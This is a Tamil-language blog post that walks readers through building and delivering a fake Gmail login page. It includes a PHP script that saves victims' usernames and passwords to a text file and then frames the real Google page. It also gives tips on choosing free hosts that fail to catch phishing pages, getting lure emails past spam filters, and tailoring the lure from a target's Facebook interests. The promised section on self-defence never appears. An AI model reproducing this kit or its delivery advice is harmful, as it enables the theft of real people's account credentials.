இன்று நாம் பார்க்கப்போவது "பிஸ்சிங்" என்று சொல்லப்படுகின்ற ஓர் தகவல்திருட்டு முறை பற்றியாகும்.
இந்த பிஸ்ஸிங் முறை பற்றி பலரும் அறிந்திருப்பீர்கள். அதாவது நான் ஒருகொந்தர் என்று மார் தட்டும் அனைவரும் இந்த முறையை கற்றுத்தேர்ந்து தான்வந்திருப்பார்கள். ஆனால் கொந்தர்கள் உலகத்தில் மிக மிக சின்னபிள்ளை தனமானஅல்ல மிகவும் ஆரம்பகட்டமாக தாக்குதல் முறையாகவே இம்முறைமைகொள்ளப்படுகின்றது. சரி நாங்கள் இம்முறைபற்றி சற்று விலாவரியாகபார்த்துவிடலாம்.
பிஸ்ஸிங் என்பது நாம் பிரவேசிக்கும் தளத்தினை போன்றே இருக்கும் ஓர்போலித்தளத்தினை உருவாக்கி அத்தளத்தினுாடக தகவல்திருட்டினில்ஈடுபடுவதாகும். உதாரணமாக நீங்கள் ஜிமெல் கணக்கு வைத்திருப்பவர் என்றுவைத்துக்கொள்வோம். நீங்கள் உங்கள் மின்னஞ்சல் முகவரிக்கு விஜயம் செய்யும்போது அதே போன்று அச்சு அசல் காட்சியளிக்கும் ஓர் தளத்தினை தாக்குதல் தாரிஉங்களுக்கு காண்பிப்பார். நீங்களும் அவசரத்தில் உங்கள் புகுபதிகை தரவுகளைஅதிலே தந்து விடுவீர்கள். பிறகென்ன உங்கள் தகவல்கள் குறித்த கொந்தரின்கைகளுக்கு சென்றுவிடும்.
இது ஒரு நொடிப்பொழுதினிலே நடக்கும் தாக்குதலாகும். அதுவும் நீங்கள்கவனயீனமாக இருக்கும் சந்தர்ப்பங்களில் மாத்திரமே சாத்தியமாகின்றதுஇத்தாக்குதல். சரி நாம் தாக்குதல் என்றால் என்ன என்று பார்த்தாகி விட்டது. இனிநாங்கள் எவ்வாறு ஒருபோலி தளத்தினை உருவாக்குவது மற்றும் எவ்வாறுஅத்தளத்தினை மற்றவருக்கு கொண்டு சென்று சேர்ப்பது என்பதையும் அத்துடன்உங்களுக்கு யாராவது இம்முறைமூலம் தாக்குதல் நடத்த முயன்றால் எவ்வாறுஉங்களை பாதுகாத்துக்கொள்வது என்றும் நாம் பார்க்கலாம்.
போலி தளம் தயாரித்தல்
சரி. முதலில் நீங்கள் என்னமாதிரியான போலித்தளத்தினை தயாரிக்க போகின்றீர்கள்என்று முடிவு செய்துகொள்ளுங்கள். நான் உங்களுக்காக ஜிமெல் போன்றேகாட்சியளிக்கின்ற ஓர் போலித்தளத்தினை உருவாக்கி அதனை எவ்வாறு நாம் தாக்கநினைப்பவருக்கு அனுப்பவதும் என்று காட்டப்போகின்றேன்.
1. முதலில் உண்மையான ஜிமெயில் தளத்திற்கு செல்லுங்கள். அங்கு உங்கள்உலவியில் "Right click" செய்து "View page source" என்பதினை தெரிவு செய்துகொள்ளுங்கள்.
2. இப்பொழுது நீங்கள் ஜிமெயிலின் source code பார்க்க கூடியதாக இருக்கும்.இப்பொழுது நீங்கள் Ctrl + A ஒரே சமயத்தில் அமுக்கு அனைத்து கோடிங்குகளையும்தெரிவு செய்து கொள்ளுங்கள்.
3. இப்பொழுது நீங்கள் உங்கள் கணனியில் Note pad ஜ திறந்து கொள்ளுங்கள்.அதிலே நீங்கள் தெரிவு செய்து வைத்திருப்பதை Ctrl + V சொடுக்கி போஸ்ட் செய்துகொள்ளுங்கள்.
4. இப்பொழுது முழு கோடிங்கும் நீங்கள் பார்க்க கூடியதாக இருக்கும். இனி நீங்கள்படத்தில் காட்டியவாறு "Tools---> find and replace" தெரிவு செய்துவிட்டு "Action" என்றசொல்லினை தேடி அதனை "input.php" என்று பெயர் மாற்றம் செய்து கொள்ளுங்கள்.
5. இப்பொழுது நாம் மாற்றம் செய்த கோப்பினை index.html என்ற பெயரில் ஓர்கோப்பினில் சேமித்துக்கொள்ள வேண்டும்.
நீங்கள் கேக்கலாம் அது ஏன் action என்ற தொடுப்பு இருந்த இடத்திலே நாம் ஏன்input.php என்று மாற்றம் செய்தோம் என்று. அதாவது நீங்கள் குறிவைத்திருப்பவர்தனது தரவுகளை நீங்கள் அனுப்பும் இந்த பக்கத்தில் வழங்கி விட்டு login ஜசொடுக்கும் போது உங்கள் சர்வரில் அவரது தரவுகளை பதித்து விட்டு அவரை நாம்உண்மையான ஜிமெயிலின் தளத்திற்கு கைகாட்டி விட்டு விடுவோம். என்னநடக்கின்றது தெரியாமல் குழம்பிப்போய் நிப்பாரு நம்மாளு. சரி அந்த input.phpஎன்ற கோப்பினை எவ்வாறு உருவாக்குவாது என்பதினை பார்த்துவிடலாம். இங்கேகீழே காணப்படுகின்ற இந்த கோடிங்கினை கொப்பி செய்து ஒரு Note pad ல் ஒட்டிவிடுங்கள். அந்த கோப்பினை input.php என்ற பெயரினில் ஏற்கனவே index.htmlகோப்பு இருக்கும் இடத்தில் சேமித்துவிடுங்கள்.
- <?php /* Created on: 5/08/2011 By: Spid3rB0il66*/
- $fp = fopen("password.txt", "a");
- fwrite($fp, "Username:$_POST[Email]\tPassword:$_POST[Passwd]");
- echo "<HTML>
- <head>
- <title>Welcome to Gmail</title>
- <FRAMESET cols=\"*\">
- <FRAME SRC=\"https://www.google.com/accounts/ServiceLoginAuth\">
- </FRAMESET>";?>
உங்கள் வேலை இன்னமும் முடியவில்லை. நீங்கள் சேமித்து வைத்திருக்கும்இடத்தினில் password.txt எனும் பெயரில் ஓர் சாதாரண text file ஒன்றினைசேமித்துக்கொள்ளுங்கள். இப்பொழுது எங்கள் ஜிமெயிலின் போலிப்பக்கத்தினைசர்வர் ஒன்றினை உருவாக்கி எவ்வாறு சேமிப்பது என்று பார்த்து விடலாம்.
கோப்புக்களினை பதிவேற்றம் செய்தல்.
இணையத்திலே பல நிறுவனங்கள் இலவசமாக Web hosting வசதிகளைவழங்குகின்றன. அனேக தளங்கள் இந்த மாதிரியான போலிப்பக்கங்கள் பதிவேற்றம்செய்யும் சந்தர்ப்பத்தில் அவற்றினை இனங்கண்டு அழித்துவிடுவதற்கென பலScripts தன்னகத்தே கொண்டுள்ளன. ஆக நீங்கள் உங்கள் போலிப்பக்க்தினைபதிவேற்றம் செய்து அடுத்த நிமிடமே உங்கள் கணக்கு முடக்கப்படலாம்.துவண்டுவிடாமல் பல தளங்களிலும் உங்கள் கோப்பினை பதிவேற்றம் செய்யவேண்டும். அப்பொழுது தான் பத்தில் ஒன்றாவது வேலை செய்யும். சரி.இலவசமாக Web hosting வசதினை வழங்கும் நிறுவனங்கள் அனைத்தையும்தன்னகத்தே கொண்ட ஓர் தளம் தான் www.free-webhosts.com தளமாகும்.இத்தளத்தினிலே இலவசமாக சேவையை வழங்கும் நிறுவனங்கள்பட்டியலிடப்பட்டிருக்கும். விளம்பரங்கள் இல்லாத தளமாய் ஒன்றினை தெரிவுசெய்து அதிலே உங்களுக்கு ஓர் கணக்கினை உருவாக்கி கொள்ளுங்கள்.www.byethost31.com தான் என்னுடைய பரிந்துரைப்பு. ஏன் என்று சொன்னால்இத்தளத்தில் போலிப்பக்கங்களை கண்டு பிடிப்பதற்கான Scripts இருந்தும் அவைசரிவர இயங்கவில்லை.
ஒரு புதிய மின்னஞ்சல் கணக்கு ஒன்றினை ஆரம்பித்துக்கொள்ளுங்கள். அப்பொழுதுதான் நீங்கள் போலித்தளத்துடன் அனுப்பும் மின்னஞ்சல் Junk folderல் செல்லாமல்inbox ற்கு செல்லும். சரி. தற்காலத்தில் என்ன விடையம் பரபரப்பாக இருக்கின்றதோஅதனை சம்பந்தப்படுத்தி ஓர் அழகிய மி்ன்னஞ்சல் ஒன்றினைஉருவாக்கிக்கொள்ளுங்கள். உங்கள் இலக்கு அதாவது நீங்கள் தாக்கவிருப்பவருக்குஎன்ன விடையங்கள் பிடிக்கும் என்று அவருடைய முகப்புத்தகத்தில் சென்றுபார்த்தீர்களேயானால் இலகுவாக கண்டறிந்துவிடலாம். மின்னஞ்சலினைதயாரித்துவிட்டு இறுதியினிலே படத்தினிலே காட்டப்பட்டிருப்பது போன்றுஉண்மையான ஒரு தொடர்பின் பின் உங்கள் போலித்தளத்தின் சுட்டியினை வழங்கிவிடுங்கள். இலக்கு அந்த சுட்டியிலே சொடுக்கி சென்று பார்க்க கூடியவாறு உங்கள்மின்னஞ்சல் கவர்ச்சிகரமாக இருக்கவேண்டும் என்பதினை மறந்துவிடாதீர்கள். இனி நீங்கள் செய்யவேண்டியது எல்லாம் நீங்கள் இலக்குவைத்திருப்பவரைஅவருடைய கணக்கு புகுபதிதை தகவல்களை இந்த போலித்தளத்திலேவழங்குவதற்கு ஒரு சந்தர்ப்பத்தினை உருவாக்க வேண்டும். தெளிவாககூறப்போனால் அவரை ஏமாற்றி உங்கள் சதி வலையில் சிக்க வைக்க வேண்டும்.அந்த பெரிய ஈபிள் கோபுரத்தினையே ஒருவர் தன்னுடையது என்று கூறி பலதடவைகள் விற்க முயற்சித்திருக்கின்றார். நீங்கள் சாதாரண இந்த இலக்கினைஏமாற்ற முடியாதா? Best social engineering skill தான் தேவை என்கிற அவசியம்இல்லை. சும்மா சாதாரண கள்ள புத்தி இருந்தாலே போதும். எல்லாம் இலகுவாகிவிடும். சரி. எனக்கு நீங்கள் திட்டுவது புரிகின்றது ஏன்டா இந்தளவும் அழகா சொல்லிதந்துவிட்டு ஏன் கடைசில சொதப்பல் என்று தானே திட்டுறீங்க. இதே அதையும்காட்டிடுறன்.
Please Write your comment.
its very interesting.
பதிலளிநீக்கு